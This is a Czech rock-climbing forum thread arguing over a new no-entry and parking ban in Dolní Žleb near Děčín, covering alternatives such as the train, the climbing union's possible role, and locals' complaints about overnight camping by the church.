        Re: klidek10:07:40 07.06.2018
    Tohle je celkem složitá filozofická otázka?
    Mám právo bránit ostatním v přístupu (modré zóny, zákazy parkování) jenom proto, že jsem si koupil pár metrů čtverečních pozemku? Pokud parkuji na svém, tak bez problému, ale mám vůbec nějaké právo parkování na veřejném víc než návštěva?
    Souhlasím s tím, že mě kolikrát sere, jak jsou lezci líní chodit pěšky ke skalám a kolikrát kvůli pár desítkám metrů porušují zákaz, či alespoň rozumnou míru a pak dojde na to, že se místní naštvou a zakáží to zcela.
    Konkrétně v Labáku jsem také nikdy nerozumněl té touze vyjet autem až na plácek nad Kosťou, či podobná místa v centru, kde je silnice sotva na jedno auto. Teď je to skoro druhý extrém a to - půjdeme z Děčína. ...No dobře
    Adamodpovědět 
         Re: klidek10:12:02 07.06.2018
    Omlouvám se, blbě jsem četl. Zákaz vjezdu do centra a parkování u viaduktu mi vzhledem ke stavu komunikací ve žlebu. přijde jako naprosto rozumné řešení.
    Adamodpovědět 
       Re: klidek14:08:16 07.06.2018
    Bydlel jsem v Dejvicich. To bylo takove parkoviste pro stredocechy. Vetsinou jsem kvuli nim zoufale objizdel bloky, ztratil tunu casu a parkovat nekolik bloku od baraku. Po zavedeni zon je situace o dost lepsi. A vubec mi nevadi, ze zony maji jinde. Vzdy se da najit jine reseni. Vsude kde je modra, mas i placena parkoviste nebo zvolim jiny zpusob dopravy nebo upravim vychozi misto. Dost jednoduche, zkus to nekdy taky. V cizine vcelku bezny model. A ted si predstav, ze nektera zapadni mesta maji cele ctvrti kam je tem prespolnim vjezd zakazan a ted ... je mi to lito, ze ti to musim rici ... si to ti prespolni vlastne dost vychvaluji.
    odpovědět 
        Re: klidek14:20:16 07.06.2018
    Jak pravíš, vždy je nějaká alternativa. Bohužel, tady alternativa znamená "je místo u viaduktu" vs. parkování v Děčíně. Jestli je místo u viaduktu se dá bohužel ověřit pouze empiricky. Tedy mi tato situace šťastná nepřijde. Myslím, že kdyby místní postavili placené parkoviště, mohli by si ještě nakrmit rozpočet (nebo spíš zaplatit to parkoviště).
    hulakodpovědět 
         Re: klidek15:05:44 07.06.2018
    Parkovani v Decine, treba pod mostem nebo u hriste, mi prijde naprosto v pohode, ale asi nepatrim mezi ty, kteri potrebuji dojet autem az do mista, kde chteji vykonavat sport. Lezu dost v horach a tam taky necekam, ze si dovezu prdel az nastup. Dalsi skvelou alternativou je dojet do Zlebu osobakem z Decina. Spis mi prijde, ze se tu zaviraji oci pred mnoha alternativami..
    Stesky u piskaru za tu pul hodinku chuze nebo par minut vlakem me fakt prekvapuji.

    Co se tyka parkoviste. Asi to tam moc neznas.. Na to tam proste neni prostor. A jak pise nekdo vyse, kdyby se to vyplatilo, uz je tam davno.
    odpovědět 
          Re: klidek20:06:57 07.06.2018
    Půlhodinka chůze je to často od auta ve Žlebu. Z Děčína spíš hodka a půl chůze (záleží kam přesně). Zhruba dvakrát jsem to v posledních letech šel.
    Osobák není špatný, třeba přidají vagón, když začnou jezdit i lezci. Párkrát jsem v posledních letech i tím vlakem ("tramvají") z Děčína do Žlebu jel, a občas byl překvapivě plnej. A mohli by přidat třeba večer i nějaké spoje.
    P.odpovědět 
           Re: klidek20:49:49 07.06.2018
    Tak hodka je porad v pohode, ne? Kdyz mas fyzicku a si rychlej, das to za min.

    Fakt to nechapu. To je porad kriku, jak ma zustat jisteni daleko, jak se nemaji prejistovat i idiotsky osazena jisteni, jak se nesmi magovat, ze to holt neni pro vsechny - neni to umelka. A pak se najednou (nemyslim Tebe) lezci mohou posrat kdyz nemohou dojet autem o 2 - 3 km dal.
    odpovědět 
            Re: klidek21:32:21 07.06.2018
    No, ono to je spíš asi k 8 kilometrům, ne? Z parkáče na začátku cyklostezky možná trochu míň, ale 6 určitě. Třeba k hraničnímu jezírku fakt pěkná procházka z Děčína - a večer zpátky.
    P.odpovědět 
             Re: klidek22:02:48 07.06.2018
    Dneska jsem viděl v dekáči celkem dobrá skládací kola. Do kufru se vejdou v pohodě, o dodávce ani nemluvím... Na těch pár km to bohatě stačí.
    odpovědět 
             Re: klidek00:30:46 08.06.2018
    Jo, sorry je to vic. Ale takova hruza to neni. Rozhodne ne pro takove frajery jako jsou piskari, kteri razi, ze pisky nejsou pro kazdou padavku z preklizky.
    odpovědět 
         Re: klidek15:08:48 07.06.2018
    Nakolik chápeš podstatu věci? Místním vadí cizí lidé, co jim tam jezdí. Jak parkoviště omezí dopravu? A kromě toho, jak tam budeš vybírat parkové? Kolik lezců tam ročně zaparkuje, jaký by byl odhadovaný přínos? Zaplatí se z toho provoz, tedy závora a autmatizovaný systém nebo výběrčí? A udělat parkoviště před? Jestli jsem to dobře z textu pochopil, pozemky tam jsou soukromé. V úvodu jasně stojí psáno:

    Prosíme, k parkování nevyužívejte ke spojovací silnici přilehlé plochy soukromých majitelů bez jejich výslovného souhlasu.

    Takže se znovu zeptám - co brání ČHS, kdž tam chtějí lezci parkovat, aby se domluvil s někým z těchto majitelů a pozemek na parkoviště pro své členy pronajal?
    odpovědět 
          Re: klidek19:34:38 07.06.2018
    Například to, že těch, co jezdí do Labáku je v celkovém počtu členů malá menšina a je otázka, jestli by se té většině líbilo dávat peníze ze společného rozpočtu té menšině na parkování.
    odpovědět 
           Re: klidek20:52:03 07.06.2018
    To je hloupost, jakákoliv organizace nemůže dělat jen to, co vyhovuje většině. To bys pak třeba nemohl ani přispět na jištění v málo využívaných oblastech a podobně. A navíc nemůžeš vědět, zda, pokud by tam ČHS nevybudovalo nějaké zázemí, by se počet lezců nezvýšil.
    odpovědět 
            Re: klidek00:34:36 08.06.2018
    Tak si to lezci vyjednejte a zaplatte. Nemuzes cekat, ze pro tebe neco udelaji lide, ktere nezajimas a spis je obtezujes.
    odpovědět 
        Re: klidek11:06:21 08.06.2018
    Představ si, bydlel jsem různě po Praze a po tom, co zavedli modrý zóny jsem třeba při cestě domů pořádně nemohl ani k ševci, či do krámu v Dejvicích, protože modrý zony. Modrá zóna je zlo. Trvalé bydliště mám v jedné městské části, bydlíš v jiné, babičky a dědečky, každého jinde, občas tam potřebuješ zastavit, abys jim třeba něco přivezl, nebo odvezl je. Nebo se tam stavil s něčím. Zelená zona daleko a plná. Seš Pražák jako poleno několik generací, ale nemůžeš nikde zastavit ve vlastním městě, protože se ti do něj stahujou vesničani za prací, co se chtějí mít jako Pražáci, nebo Pražáci, co si koupili ošklivý domek za Prahou, lidi, co tu bydlí, a pracují a na víkendy jezdí domů, bydliště mají v horní dolní. Teď nás ty dvě skupiny každý den otravují svými výpary, ještě mají diesely bez filtrů pevných částic. Nikdo rozumný po Praze nejezdí autem, když socka je rychlejší, levnější a můžeš si číst, ale jsou situace, kdy někam tím autem potřebuješ a nemůžeš, anebo musíš platit tolik, že za pár dní by jsi si z toho mohl koupit další parkovací kartu na rok, která je ti k prdu, protože ani po cestě na chalupu, do Labáku aj. se pozdravit dědu nestavíš.
    A stejně je Praha plná aut. Jen místí mají spoustu problémů a Středočeši zase parkujou o pár ulic dál.
    Co by dávalo smysl? Karta pro celou Prahu a zony v celý Praze, že jo, A proč to není?

    Ve žlebu mohli dát zákazy stání, nebo parkoviště jen pro rezidenty.

    Vsadím boty, že Kosťa bude vystavovat za úplatu potvrzení o ubytování, anebo si někdo koupí pár metrů lesa.

    Zase tam bude klid, budou tam jezdit jen srdcaři, kempování všude po žlebu je hnus. Na druhou stranu udělat tam dál u řeky parkoviště a kemp, zákazy dál, by bylo lepší řešení.
    Anebo teda aspoň dost parkování u nádraží a nějak střeženo.
    k.odpovědět 
     Re: klidek13:08:20 06.06.2018
    :)))))))
    odpovědět 
     Re: klidek13:17:09 06.06.2018
    Hele, a proč by to dělali? Kdo by to tam provozoval? Nenapadlo tě, že pokud by to bylo ekonomicky zajímavé, že už to dávno je? A pokud není, proč bys nutil místní do něčeho, na co by jen dopláceli a přinášelo to jen potíže a práci navíc?
    odpovědět 
      Re: klidek16:48:33 06.06.2018
    No prece kvuli nam, lezcum. Nas by prece meli vsichni podporovat i kdyz na tom trati!
    odpovědět 

     privoz?13:00:22 06.06.2018
    A prejet privozem nepujde?
    Milanodpovědět 
     Re: privoz?13:23:19 06.06.2018
    když bude voda, což není, tak půjde
    odpovědět 
      Re: privoz?00:24:43 13.06.2018
    když bude vody málo, tak se bude brodit!
    odpovědět 

     Info prosím13:41:56 06.06.2018
    Ahoj, předně bych chtěl požádat o smysluplnou diskuzi na toto téma – a chtěl bych tímto také shrnout dosavadní jednání Osadního výboru DŽ (OSVDŽ), jehož nejsem členem, ale to vše mně zajímá, protože sám aktivně v Dolním Žlebu lezu. Bude to trochu delší text, ale jak jsem psal, snažím se shrnout informace a pak také zjistit trochu více, tak prosím o trpělivost. Asi je jasné, že k tomu již muselo dojít a dle zápisů OSVDŽ je toto téma probíráno již v zápisu č.3, bod 7) z 26.9.2017 - kde je mj. uvedeno: "Smyslem naší snahy není omezení cestovního ruchu, ale nabídnutí alternativních řešení pro turisty, a to v rámci parkování, tak další infrastruktury a sociálního zázemí." - avšak v zápisu č.4 v bodě 4) z 15.11.2017 se již píše: „OSVDŽ připravil k dalšímu posouzení několik variant opatření, jejichž zavedení by mohlo vést k regulaci parkování a kempování…“ a dále:“ OSVDŽ tímto vyzývá jednotlivé odbory Magistrátu ….a Městské policie ke společnému jednání a posouzení návrhů připravených OSVDŽ, a to v nejbližším možném termínu, aby případná opatření mohla být alespoň částečně a postupně zavedena již před letní turistickou sezonou 2018“ V zápisu č.1 bod 4) z 25.1.2018 už ale dochází pouze k informování o výsledcích schůzky konané 3.1.2018  a dále: „OSVDŽ ve spolupráci s MP a OKD provede místní šetření za účelem vytipování umístění dopravního značení…Zároveň Povodí Labe s.p. …prověří možnosti parkování v prostoru mezi Čertovou Vodou a Dolním Žlebem – zastávka.“
    Zajímá mě, jakým byla tato celá akce vykomunikována mezi OSVDŽ a turisty, lezci a ostatními. Chápu, že iniciativa ze strany OSVDŽ v tomto směru by mohla narazit na možný neúspěch, ale přeci jen jsem nikde neviděl, že by bylo někde nějaké oznámení o této změně (u kostela, u Kosti a jinde), nikde se nediskutovalo na společných setkáních a pokud ano, tak se to ke mně nedostalo. K vyřešení této „věci“ by právě diskuze mohla přispět a přimět i ostatní lidi (ne místní obyvatele), kteří se pohybují v Dolním Žlebu, k zamyšlení a možnému vymyšlení řešení. Pokud si však osazenstvo OSVDŽ myslelo, že postup, který zvolili, něco změní, resp. omezení činnosti turistů a lezců se tak zmenší, tak si myslím, že to není nejšťastnější řešení. Tento postup bude vytvářet spíše pouze problémy.
    Dostávám se k dotazům, které mě zajímají a byl bych rád, kdyby se osazenstvo OSVDŽ, třeba prostřednictvím diskuze, pokusilo na tyto dotazy odpovědět.
    1) Proč nebyla veřejnost informována o omezení provozu v Dolním Žlebu již ve fázi plánování vloni? A nezajímá mně odpověď, že jsem měl sledovat zápisy OSVDŽ (donedávna jsem ani nevěděl, že něco jako osadní výbor v Dolním Žlebu existuje)

    2) Je opravdu omezení provozu pomocí dopravního značení jediné řešení, jak se situací naložit?

    3) Někteří členové OSVDŽ jsou/byli sami lezci – přijde jim toto omezení (z pohledu lezců) jako smysluplné?

    4) Proč je do tohoto jednání vtahováno Povodí Labe s.p., když některé pozemky jsou v územním plánu ve vlastnictví města Děčína?

    5) Bude osazenstvo OSVDŽ informovat pravidelně MP Děčín o případném /nedodržování porušování dopravního značení?

    6) Je nabídnutí alternativních řešení parkování mezi Čertovou Vodou a Dolním Žlebem - zastávka jedinou možností?

    Díky předem za veřejné odpovědi (nestojím o tunu emailů) a omlouvám se za případné chyby, ať už stylistické, pravopisné či legislativní.
    František


     Frapodpovědět 
     Re: Info prosím15:16:43 06.06.2018
    A mě zase vůbec nezajímá Tvůj pláč. A taky mě nezajímá, že se zajímáš až tehdy, když Ti někdo naruší tvoje pohodlí v místech, kde jsi beztak hostem.
    Danodpovědět 
      Re: Info prosím15:23:58 06.06.2018
    Děkuji za Tvůj názor, ale ohledně parkování ve Žlebu jsem uvažoval už někdy před 10 lety, kdy jsem tam jezdil vlakem. Zatím to nebylo potřeba, ale nyní je situace jiná. Pokud jsi místní, proč jsi něco nepodnikl už dřív? Najednou ti to vadí a např. před 5 lety to nevadilo? Debatuj k věci a pocity nech stranou - fakta jsou důležitější.
    odpovědět 
       Re: Info prosím15:24:15 06.06.2018
    Frap
    Frapodpovědět 
       Re: Info prosím16:45:15 06.06.2018
    To vadilo mistnim a vsem se co se tam pohybuji uz davno. Jen to rozhoupani zastupitelu k cinu je pomale. Pokud chces v cechach aplikovat strategii "kdyz se neco nezmeni hned, znamena to, ze by se to nemelo menit vubec" tak to potes...
    odpovědět 
        Re: Info prosím17:05:15 06.06.2018
    Ano, urcitě by se některým věcem mělo předcházet, jen mi není jasné, proč by se někdy nemohlo vše řešit až v momentě, kdy situace nastane. Rozhoupaní zastupitelů je jedna věc, forma podání informací je věcí druhou. Kdo chce, cestu si ke skalám najde, ať už vlakem, autem nebo na kole. Napsal jsem můj komentář, protože mě to zkrátka překvapilo. Nic víc...je to zároveň také moje stanovisko, se kterým mnozí mohou, ale nemusí souhlasit.
    Frapodpovědět 
         Re: Info prosím22:57:10 06.06.2018
    "jen mi není jasné, proč by se někdy nemohlo vše řešit až v momentě, kdy situace nastane."
    Vsak situace nastala uz davno. To "az" neni na miste. Resi se to se spozdenim.
    odpovědět 

     Abc14:45:17 06.06.2018
    Logický výsledek "každovíkendové" situace, kdy se plácek u kostela zahltí dodávkami o průměrné obsazenosti dva lidé (občas pes). Nedělal bych z toho tragédii, do Žlebu je velmi slušné spojení vlakem, spíš bych se z toho snažil ponaučit, aby tak nedopadly další oblasti.
    Roubajsodpovědět 
     Re: Abc15:02:56 06.06.2018
    Tak jak v kocourkově mě to někdy v ČR připadá.
    Zákaz vjezdu, proč ne souhlasím dopravní situace byla tragická a toto opatření má jistě smysl, ale přístup, kterým se k němu došlo je z mého pohledu alibismus a neochota něco řešit koncepčně a smysluplně.
    Proč se tedy zároveň s represivním opatřením “Zákazu vjezdu“ neudělalo i nějaké opatření B – vyhrazení místa pro parkování na obecní louce, či pozemku s danými pravidly a klidně i za menší poplatek! Proč tohle nejde, nebo na to nikdo ze zástupců obce nepomyslel? Nemělo smysl vést širší diskuzi?
    Nerfodpovědět 
      Re: Abc15:06:36 06.06.2018
    Diskutujete teď tady...z lezců asi nikdo nepřišel a nezeptal se, jak by se to dalo do budoucna řešit...proto se nedivím, že ze strany obce taky nebyla diskuse a proste to tam plácli...je to jak je a je na místě to respektovat.
    Paďasodpovědět 
      Role ČHS16:51:18 06.06.2018
    Hele, ale co když oni tam ty lidi vůbec nechtějí? Proč by měli trpět tím, že jim tam někod bude projíždět na nějaké parkoviště? Ono ani to parkoviště není zadarmo. Na obecní louce? proč proboha? Proč by měla obec ničit nějaký svůj pozemek kvůli tvojí kratochvíli? Lezci jsou prasata, auta nemívají zrovna moc dobrá, teče z toho olej a padají bordely, proč by to ta obce dělala? Ale přesně tohle by měla být role ČHS. Má obec dělat a mít náklady s nějakým parkovištěm pro lezce? Blbost. Ať si ČHS tu louku pronajme a parkoviště tam založí a spravuje svaz. dejte si tam omezení Parkování povolenu pouze pro členy ČHS a máte klid. Chcete lézt? Ok. Kdo z ČHS přišel s tím, zda by obec svazu nepronajala nějaké pozemky vhodné na tábořiště a parkování????
    odpovědět 
       Re: Role ČHS17:20:14 06.06.2018
    No, toto je aspoň něco konstruktivního, palec hore.
    Danodpovědět 
       Re: Role ČHS13:01:42 07.06.2018
    Proč si místní myslí, že mají právo někoho nechtít na veřejném prostranství? Než pár metrů okolo baráku jim nic jiného nepatří.Daně platíme všichni stejné, takže ta komunikace by právem měla být přístupná všem. Ať si jí tedy místňáci od státu koupí a sami udržují, pak budou mít právo na zákazy. Nechápu proč si mám platit kus silnice, na kterou mě pak nepustí!!!
    Hafiodpovědět 
        Re: Role ČHS13:30:26 07.06.2018
    Naštěstí fungování světa není založeno na tom, co ty chápeš, nebo ne :-) Jestli si myslíš, že máš pravdu ty a ne oni, nic ti nebrání jejich rozhodnutí napadnout a donutit je značky sundat :-)
    odpovědět 
        Re: Role ČHS14:10:08 07.06.2018
    Jako ze se mesto nesmi rozhodhout jak bude regulovat provoz na svem uzemi? :-O
    odpovědět 
         Re: Role ČHS17:38:18 07.06.2018
    Presne tak! Kazde mesto je soucasti statu a jedine ten je konecnou instanci rozhodovani (statni suverenita...)
    Kdyby kazde Kotehulky mohly zakazat prujezd vsem ostatnim, pripadne vybirat myto/ vypalne tak jsme zpatky ve stredoveku.
    odpovědět 
          Re: Role ČHS18:39:24 07.06.2018
    Presne. Takove narusovani petiletky si nenechame vnutit..
    odpovědět 

     Plácek nad kostí18:01:09 06.06.2018
    Dotaz: Když spím na louce nad kostí (u chaty), a platím poplatek, projet autem můžu?
    hulakodpovědět 
     Re: Plácek nad kostí18:39:07 06.06.2018
    To bude pěkný spor ve správním řízení. Fakticky tam máš zajištěné ubytování, takže jsi dopravní obsluha. Městapák si to určitě myslet nebude, úřad taky ne. Skončíš u NS. Pokud jsi právník, jdi do toho.
    Arcikacirodpovědět 
      Re: Plácek nad kostí18:52:48 06.06.2018
    Ale houby - definice dopravní obsluhy je (kromě taxi):

    ...vozidla, jejichž řidiči nebo provozovatelé mají za značkou bydliště, ubytování, sídlo nebo nemovitost.

    Toť vše. A jelikož nikde není specifikováno, o jaký typ ubytování se jedná, tak pokud tam jsi oficiálně ubytován, můžeš tam.

    Zákony si chce přečíst ideálně i s výkladem :-)
    odpovědět 
       Re: Plácek nad kostí19:25:56 06.06.2018
    Tak nějak jsem si to myslel. Jen se těším, až mi tam budou vydávat potvrzení o ubytování :).
    hulakodpovědět 
        Re: Plácek nad kostí19:35:09 06.06.2018
    Tak lepí se za auto i za osoby. Jen nevím, jestli není příjemce HO Děčín.
    odpovědět 

     Bez motoru21:48:43 06.06.2018
    Musíte jezdit od Maxiček lesem bez motoru, pak nejste motorové vozidlo.
    Bídaodpovědět 
     Re: Bez motoru22:17:19 06.06.2018
    Tam už se jezdí i s motorem :-D
    odpovědět 
      Re: Bez motoru22:54:53 06.06.2018
    A co teprve jezdit lodí!
    Bídaodpovědět 
       Re: Bez motoru07:50:11 07.06.2018
    Od Maxiček?
    odpovědět 
        Re: Bez motoru09:48:13 07.06.2018
    z Plzne
    odpovědět 
       Re: Bez motoru09:36:07 07.06.2018
    Jedině se sklenkou koňáku v ruce...
    Papoušodpovědět 
     Re: Bez motoru22:59:39 06.06.2018
    Aspon piskovcovi lezci nazenou trochu svalu az to auto budou bez motoru tlacit zpatky na Maxicky.
    odpovědět 
     Re: Bez motoru11:38:12 07.06.2018
    Příležitost pro obchodně smýšlejícího mísťnáka co si před zákazem za malej poplatek k lezcům přisedne aby se tak stal osobou přepravovanou.
    Matejodpovědět 

     Konečný řešení08:01:25 07.06.2018
    Co takhle zpoplatnit parkování formou jakéhosi kreditu do místních hospod. Třeba litr na auto/den. Lidi by přestali jezdit po jednom až dvou v autě, případně byse pak museli večer trochu snažit, aby jim to nepřišlo líto a spousta by jich raději jela tím vlakem.
    Willhemodpovědět 
     Jak to delali driv?09:30:10 07.06.2018
    Ona vede do Zlebu silnice? Sakra zo uz jsem tam dlouho nebyl.
    odpovědět 
      Re: Jak to delali driv?13:57:43 07.06.2018
    Když zákaz, tak zákaz vjezdu i pro dopravní obsluhu. Když půjdu po svých, nenechám se obtěžovat bezohlednou jízdou místních pupíků.
    honzaodpovědět 
       Re: Jak to delali driv?14:13:06 07.06.2018
    Ta me tedy nijak nepohorsuje. Ani neni pricinou situace ve Zlebu.
    Btw. taky nechapu, proc kdyz maji zakaz rizeni osoby mladsi 18ti let, proc ho tedy pak nemaji uplne vsichni bez rozdilu veku.
    odpovědět 

     Labská19:01:09 07.06.2018
    Zákaz vjezdu i na Labské Stráni! A nejen k lesu a do polí.
    Moderní lezecodpovědět 
     Re: Labská05:07:51 08.06.2018
    Jsou to snad veřejné komunikace, bohužel se tento jednoduchý způsob řešení problému rozmaha. Druhá věc ze lidi jsou ovada a nedokáží si uvědomit, ze když někde jsem, tak bych měl respektovat základní pravidla a neomezoval ostatní, což si lezci dost často neuvědomují. Na jedné straně s mistnakama souhlasím, ale bohužel omezení využívání veřejného prostoru není řešení. Takhle to muže udělat každý a je vymalováno. Najít jiné řešení je těžké a běh na dlouhou trať. On ten pohled je jednoduchý, chceš to mít jenom pro sebe. OK, ale pak nenatahuj ruce a plat si všechno sám, údržbu silnice, veřejné osvětlení atd. A co CHS, obrátí se na ombudsmana? Nebo bude mrtvý brouk.
    odpovědět 
      Re: Labská08:15:58 08.06.2018
    Teda ty píšeš kraviny. Podívej se třeba do Prahy. Když je někde velká doprava a řidič začnou objíždět kolony kudy nemají, třeba přes obytné čtvrti, prostě se tam dá zákaz vjezdu a hotovo. Ombudsman.. jsi vtipný.
    odpovědět 
       Re: Labská14:36:33 08.06.2018
    To ze si necháš kálet na hlavu je tvůj problem.
    odpovědět 
        Re: Labská15:51:12 08.06.2018
    Jsi vtipný :-) Už tě vidím, jak protestuješ proti zákazu vjezdu, který se ti nelíbí :-) A co takhle nějaký úspěch? Pochlub se. Kde jsi dosáhl stažení značek?
    odpovědět 
         Re: Labská08:11:23 09.06.2018
    No vidíš. Jsem vtipný, ty zase vůbec. Pokud je komunikace vybudována z veřejných peněz, tak jaký je rozdíl mezi člověkem žijící v ulici, kde každý den projede stovky aut, oproti někomu kdo ke na tom z hlediska polohy lépe. Žádný. To ze se někdo rozhodne, ze mu něco nevyhovuje, ke sice krásný, ale ve své podstatě se jedna o ohýbání práva úředníky. Pod vlivem rozhorcenych občanů. Ve své podstatě jediným omezením můžou být technické parametry, jako je nosnost. To ze si prazaci udělali modré zóny. Kdyby se chovali všichni stejně, tak pražak už nezaparkuje nikde mimo Prahu. Bohužel lavina byla spuštěna s teď to kopírují další. Neschopný úředníci 30 let neřešili zásadní problémy, kradli, stavěli golfová hřiště, cyklostezky atd a teď mysli ze zákazy něco vyřeší. Pro me je to případ pro ombudsmana, s byl bych rad aby VHS v tomto konalo. Jak říkám, chceš omezení, pak nemůžeš chtít prachy z rozpočtu. Proč bych měl platit někomu, ze si muže parkovat na veřejné komunikaci a druhy nikoliv.
    odpovědět 
          Re: Labská08:27:16 09.06.2018
    U nás jsme také prosadili značku Průjezd zakázán. Ne, fakt tu nechci cizí. Jezdi si u sebe a sem nám nelez. Chci tu klid, ne auto za autem. Stačí? A ten tvůj scénář o zónách - já s těmi zónami souhlasím. Nadělal bych je po celé ČR. Nevidím důvodu, proč bys mi měl parkovat před barákem, já ti před tvůj také nejezdím. Takže lavina ať se valí. Naprostá většina lidí jezdí auty zbytečně, jestli za něco chceš bojovat, bojuj za lepší dopravní obslužnost, Zóny ať udělají ve všech městech, kromě páteřních silnic bych dal do obcí zákazy vjezdu, fakt není nutné, aby někdo coural po trojkách přes vesnice jen proto, že je to o 5 minut kratší, než po I. třídě, nebo protože že šetří za známku a jezdí vedle dálnice.
    odpovědět 
           Re: Labská10:50:27 09.06.2018
    No ty seš teda případ pro Chocholouška.
    odpovědět 
            Re: Labská12:03:07 09.06.2018
    Tak podle tebe možná pro Chocholouška, podle jiných je to normální a rozumné, protože zóny se šíří, stejně tak zákazy vjezdu a průjezdu :-)
    odpovědět 
             Re: Labská16:42:41 10.06.2018
    V tomhle případě si to pak všechno plaťte sami a neni problem, tvůj pozemek konci tam kde konci tvůj plot. Ostatní je veřejný prostor a ty nemáš právo ho omezovat. Nevím proč bych měl někomu sponzorovat jeho parkování a klid.
    odpovědět 
              Re: Labská16:44:18 10.06.2018
    Pleteš se.
    odpovědět 
              Re: Labská16:58:30 11.06.2018
    Potrebuju nekam odlozit 600 tun kejdy a zaparkovat nejakou zemedelskou techniku. Kde prosim bydlis, ze bych vyuzil tve vstricnosti?
    odpovědět 
           Re: Labská17:23:31 10.06.2018
    Dopravní značku zákaz vjezdu s dodatkem mimo dopravní obsluhy případně průjezd zakázán zásadně ignoruji. Proti asociálnímu jednání lepších lidí zatím není jiné obrany.
    Arcikacirodpovědět 
            Re: Labská17:53:44 10.06.2018
    Palec nahoru, já je ignoruji také, jsem lezec, ne nějaký jouda.
    odpovědět 
             Re: Labská17:00:22 11.06.2018
    Vy budete takovi ti prijemni pohodovi lide, ktere je radost mit ve sve blizkosti. Z vas ochota a dobrost primo cisi..
    odpovědět 
     Re: Labská05:07:53 08.06.2018
    Jsou to snad veřejné komunikace, bohužel se tento jednoduchý způsob řešení problému rozmaha. Druhá věc ze lidi jsou ovada a nedokáží si uvědomit, ze když někde jsem, tak bych měl respektovat základní pravidla a neomezoval ostatní, což si lezci dost často neuvědomují. Na jedné straně s mistnakama souhlasím, ale bohužel omezení využívání veřejného prostoru není řešení. Takhle to muže udělat každý a je vymalováno. Najít jiné řešení je těžké a běh na dlouhou trať. On ten pohled je jednoduchý, chceš to mít jenom pro sebe. OK, ale pak nenatahuj ruce a plat si všechno sám, údržbu silnice, veřejné osvětlení atd. A co CHS, obrátí se na ombudsmana? Nebo bude mrtvý brouk.
    odpovědět 
      Re: Labská11:44:54 09.06.2018
    No je tam podle silničky kousek před přívozem taková parcela-nudle asi 2000m2, co patří městu Děčín. Tak si to kupte.
    ZdenekKodpovědět 
       Re: Labská12:43:42 09.06.2018
    No jasne, koupi to CHS, kazdy clen bude mit podil 1/xxxxx a bude jezdit svoji nemovitost kontrolovat :))

    Obecne bychom ale temto lokalnim vyderacum verejne komunikace odevzdavat nemeli.
    odpovědět 
        Re: Labská14:18:47 09.06.2018
    Naopak, v podobných případech by si o podobných věcech měli rozhodovat právě místní. Pokud je někde něco jako veřejný zájem, například dálnice, je to něco jiného. Ale aby ses jim přes obec coural autem jen proto, že jsi líný kousek dojít, to veřejný zájem určitě není a obce by měly mít plné právo si to pro cizí omezit.
    odpovědět 
        Re: Labská14:58:31 09.06.2018
    "Obecne bychom ale temto lokalnim vyderacum verejne komunikace odevzdavat nemeli."

    A proto maji lezce vsude tak radi :)
    odpovědět 
         Re: Labská05:57:33 10.06.2018
    Psal jsem obecne, tj zdaleka nejen pro lezce :)

    Verejne komunikace maji slouzit siroke verejnosti, a ne aby si je privatizoval osadni vybor v kdejakych Kotehulkach.
    odpovědět 
          Re: Labská08:30:13 10.06.2018
    No vidíš, a to se pleteš. Mají sice sloužit veřejnosti, ale ne široké :-)
    odpovědět 
          Re: Labská11:28:57 10.06.2018
    To si to nepochopil. Tim bylo mysleno, ze je maji tak radi kvuli temto arogantnim sebestrednym vyrokum jako zaznel vyse.
    odpovědět 

     kemping u kostela a všude okolo11:33:04 10.06.2018
    Tady přece nejde o parkování. Jde o to, že hned vedle kostela  a naproti pod hřbitovem víkend co víkend kempují lezci v dodávkách, dlouho do noci dělají hluk, pobíhají jejich psi, grilují a v neposlední řadě močí, umývají nádobí, čistí zuby všude okolo a zrovna u těchto míst klidu a piety. Stejné je to nahoře u Belvederu. U Koňáku byly stany na rozcestí i třeba celý den. Kempující mají často i docela drahý auta, takže o penězích to není, je to lifestyle. Ale rozumím, že to místní štve, kdyby mně někdo kempoval před domem, vytáčelo by mě to stejně a nečekal bych, až někdo vytvoří značky. Měli bychom místním poděkovat, že to tak douho vydrželi.
    nesmrtelný blázenodpovědět 
     Dolno Zlebni problem08:19:15 11.06.2018
    Kdyby shorel, staly by tam duby. Sudetak tam lezi v zemi i se svoji sudetou. Takze na nej curam z pyje, cistim nad nim zuby, s predstiranou pietou. Kdyby shorel, staly by tam duby, jenze je tam kde je.
    Chmurna jsou rana na Lezciodpovědět 
      Re: Dolno Zlebni problem14:57:33 11.06.2018
    Tak jestli's toto vymyslel sám, tak velky palec nahoru :-) kvetina uprostred bahna žumpy
    Pavel Keprtodpovědět 
      Re: Dolno Zlebni problem17:01:12 11.06.2018
    Popisujes nam svuj dum / byt a svuj vztah k nemu?
    odpovědět 
       Re: Dolno Zlebni problem10:31:21 14.06.2018
    Diskuze se týká obce Dolní Žleb, zejména kostela a jeho okolí, příspěvek tedy popisuje kostel a jeho okolí v Dolním Žlebu. Ne každý má stejně dlouhé vedení, to chápu, ale kde's prosimtě přišel na to, že se to týká jeho domu / bytu?
    odpovědět 
        Re: Dolno Zlebni problem11:42:43 14.06.2018
    No, holt asi fakt nemam tak kratke vedeni jako ty! Nebo, ze by ... Neee, to neeeee!
    odpovědět 

     špatná karma00:42:18 13.06.2018
    Tak důtkami by se měli mrskat hlavně ti, co v centru obce u kostela a hřbitova kempovali, jak na samotě u lesa, stáli na nevhodných místech, snídali u hřbitova a tak dále a tak dále... Chcali vůkol...
    Kam vlastně všichni chodili srát?
    Je to konec světa, ale lezci, ani jiní turisté většině občanů nic nepřináší, jen neklid.
    Chybou obce je, že pokud to byl problém, toto nikterak včas nekomunikovala a nesnažila se najít nějaké vstřícné řešení, či aspoň nedala včas najevo nějakou nótou, že se jí to nelíbí, ale hezky připosraně po česku šla za mámou ať chuligánům nabančí vařechou - jasně definovaná místa k parkování, zákaz parkování a kempování přes noc, zony, obytnou zonu, volat policii na noční spáče etc.
    Ne, rovnou bum, bez upozornění. Samozřejmě se to děje v místech, kde ruch překročí únosnou mez a obec vždy preferuje obyvatele před narušiteli, kteří mají pocit, že mohou jakkoliv kamkoliv. Ovšem, zda se nevylilo s vaničkou i dítě.
    Pokud by se našla motivovaná a movitá píča, mohla by podat správní žalobu, či co, ohledně přiměřenosti takového opatření - takové věci se dějí.
    Na druhou stranu ona romantika toho, že někam musíš dojet vlakem a dojít pěšky a tudíž tam být dlouho, spát pod převisem a všechno si tahat na zádech... Jooo, to je esence pískařství né, nějaké dodávkové pumpičkářství v dodávce za mega a značkových hadrech...
    Třeba to oddělí zrno od plev, anebo aspoň otevře diskuzi o udržitelném lezení ve smyslu vlivu nárustu lezecké populace na vycházení s místními.
